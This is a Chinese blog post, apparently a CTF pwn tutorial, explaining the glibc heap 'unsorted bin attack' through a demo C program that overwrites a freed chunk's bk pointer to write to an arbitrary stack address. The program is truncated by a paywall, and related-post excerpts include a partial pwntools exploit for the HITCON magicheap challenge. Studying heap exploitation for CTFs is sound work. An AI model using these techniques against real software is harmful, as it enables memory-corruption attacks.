ctf-pwn-堆—unsorted bin attack

已于 2023-05-24 00:56:36 修改
阅读量317 收藏 1
点赞数
文章标签: c++ 开发语言
于 2023-05-23 03:31:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_369/article/details/130818604
版权

一、HITCON Training lab14 magic heap

参考链接1:原题链接

参考链接2:教程链接

0、运行环境

        unbuntu16.04

        glibc版本在2.3以下都行,2.23、2.24、2.27......都是小于2.3的glibc版本 

1、个人翻译过后的代码(翻译自参考链接2)

//原文件名:xy369
//编译指令:gcc -g -o xy369 xy369.c
#include<stdio.h>
#include<stdlib.h>

int main(){
	fprintf(stderr,"这段代码演示了如何利用unsorted bin attack"
			"向栈中写入一个很大的无符号长整形值\n");
	fprintf(stderr,"在实践中,"
			"unsorted bin attack一般是为进一步的攻击做准备,"
			"比如重写libc中的全局变量global_max_fast,"
			"用于进一步的fastbin攻击\n\n");
			
	unsigned long target_var = 0;
	
	fprintf(stderr,"首先来第一次看看我们想要重写的目标"
			"的栈地址及存储值:\n");
	fprintf(stderr,"%p(变量的栈地址) = %ld(变量的初始值)\n\n"
	,&target_var,target_var);
	
	unsigned long *p = malloc(400);
	
	fprintf(stderr,"现在,我们在堆上申请了一个普通的chunk,"
			"它的地址是:%p\n",p);
	fprintf(stderr,"同时我们再申请一个chunk来避免第一次申请的"
			"chunk在free()后与Top chunk合并\n\n");
	
	malloc(500);
	
	free(p);
	
	fprintf(stderr,"现在,我们free掉了第一个申请的chunk"
			"它将被回收进unsorted bin中"
			"同时它的 bk 指针指向:%p\n",(void *)p[1]);
	/*------------VULNERABILITY-----------*/

	p[1] = (unsigned long)(&target_var - 2);    
	fprintf(stderr, "现在复现一个可以 "
            "重写 victim->bk 指针的漏洞\n");
	fprintf(stderr, "同时我们将其重写为 目标地址 - 16 "   
            "(在32位机上,"
            " 应该重写它为 目标地址 - 8):%p\n\n",(void *)p[1]);

  //-----------------------
最低0.47元/天 解锁文章
Mr.x丨
关注
CTF pwn入门 -- Unsorted bin
lifanxin的博客
04-08 3317
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是题中常见的,当一个块被释放时,且该块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存
pwn工具箱之unsorted bin attack
jmp esp
07-03 2828
unsorted bin attack基本信息利用类型:利用 利用类型:针对unsorted bin的利用,也就是需要用normal chunk或者large chunk释放得到的 利用思想:unsorted bin是一个双链表,在分配时会将unsorted bin中的chunk从unsorted bin中移除,是一个链表的unlink操作。如果能够控制unsorted bin chunk的
【我的 PWN 学习手札】Unsortedbin Leak
最新发布
Mr_Fmnwon的博客
09-12 993
main_arena 是一个 struct malloc_state 类型的全局变量,是 ptmalloc 管理主分配区的唯一 实例。说到全局变量,立马可以想到他会被分配在 .data 或者 .bss 等段上,那么如果我们有进程所使用的 libc 的 .so 文件的话,我们就可以获得 main_arena 与 libc 基地址的偏移,从而获取 libc 的基地址。 由于 unsorted bin 是双向链表,因此在 unsorted bin 链表中必有一个节点的 fd 指针会指向 main
PWN】Unsorted bin与Large binAttack
u014377094的博客
05-03 889
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attack与Large bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
漏洞挖掘——unsortedbin attack漏洞
董哥的黑板报
08-13 3271
一、核心思想 实现在任意地址写一个数值 局限性:通常unsortedbin attack只能够在目标地址写一个大数值 unsortedbin attack通常是为了配合fastbin attack而使用的 fastbin attack见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 二、原理图解 当从unsor...
ctf-pwn--调试
xy_369的博客
05-20 514
写这篇文章的目的是更好地去理解,不要只停留在理论知识阶段注:读这篇文章需要一定基础,不然读起来很费劲或读不懂,要是有ctf-pwn手的基本基础,只是缺乏这一块的知识,可以先把这篇文章读完,大致了解哪些地方写了哪些知识点,同时结合一些相关的链接去快速掌握在计算机内存中的运作方式。
CTF pwn入门 -- Large bin
lifanxin的博客
04-07 1891
Large bin概述攻击方式分配到目的地址house of force总结 概述   large bin采用双链表结构,libc-2.23版本下64位机器上,最小为0x400(1024字节),里面的chunk从头结点的fd指针开始,按大小顺序排列。不同于fast bin, small bin, unsorted bin的结构,当属于large bin的chunk被释放时,chunk中还会有fd_nextsize和bk_nextsize指针,分别指向前后第一个与本身chunk大小不同的chunk。当然也就
CTF资料-0x0002】PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 5874
CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
UnsortedBin Attack
yms0211的博客
09-13 1089
Unsorted Bin Attack
好好说话之Unsorted Bin Attack
hollk’s blog
01-15 4029
Unsorted Bin Attack很简单,序言就不多说了,直接看本文讲解就好,抓紧时间把wiki写完,我要去搞IOT固件分析了!!!!
Unsorted Bin Attack:2016 0CTF zerostorage
Mira_Hu的博客
12-09 228
概述 Unsorted Bin Attack ,顾名思义,该攻击与glibc 管理中的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin chunk 的bk 指针。 Unsorted Bin Attack 可以达到的效果是实现修改任意地址为一个较大的数值。 Unsorted Bin 回顾 在介绍 Unsorted...
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 289
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑块,根据bss段里的指针,来找到相应的块,然后输入大小,再填充内容,并未检测原本输入块内容的大小,那么此处存在溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
[安洵杯 2019]Attack
zip471642048的博客
06-27 228
题目地址 : https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]Attack foremost 分离在zip文件中发现含有flag.txt 的压缩包,
unsortedbin attack
yjh_fnu_ltn的博客
07-19 989
(因为unsorted_chunks(av)地址本来就知道,不需要用过链尾的p去找它的下一个即fd值),所以即使我们修改了其为一个不合法的值也没有关系。然而,需要注意的是,unsorted bin 链表可能就此破坏,在插入 chunk 时,可能会出现问题。类似于unlink的过程,要将链尾的chunkp,取出来,即 unsorted_chunks(av)->bk = p->bk;我们可以看到,在该链表中必有一个节点(不准确的说,是尾节点,这个就意会一下把,毕竟循环链表实际上没有头尾)的。
从wiki 重新打基础之 Unsorted Bin Attack
qq_41071646的博客
07-19 418
之所以 看 Unsorted Bin Attack 因为感觉 Fastbin 还有 UAF算是比较熟悉的 所以 直接看 Unsorted Bin 其实Unsorted Bin 也是比较熟悉的 在泄露 libc库的时候就认真的看过 这个东西 ,是当small chunk或large chunkfree掉之后,不会直接进入smallbin或largebin,而是会先进入unsorte...
unsorted bin attack
abelxu
11-17 402
0x01 unsorted bin 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。 基本使用情况
how2heap-2.23-05-unsorted_bin_attack
blind cat
01-04 981
从unsorted bin的bk中,获取最旧的chunk,之后再根据chunk->bk,从最旧到最新开始遍历,尝试在unsorted bin链表中找到合适的chunk。然后chunk a就脱链(怎么脱链,放到哪里的逻辑,在修正的代码之后),unsorted bin和chunk b开始修正其fd,bk,修正的代码就是上面的。unsorted bin attack的效果就是在指定的位置,写入unsorted bin头结点的首地址,就是那个所谓的较大的值。就发生在chunk脱链,
hitcontraining magicheap
pondzhang的专栏
06-16 372
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值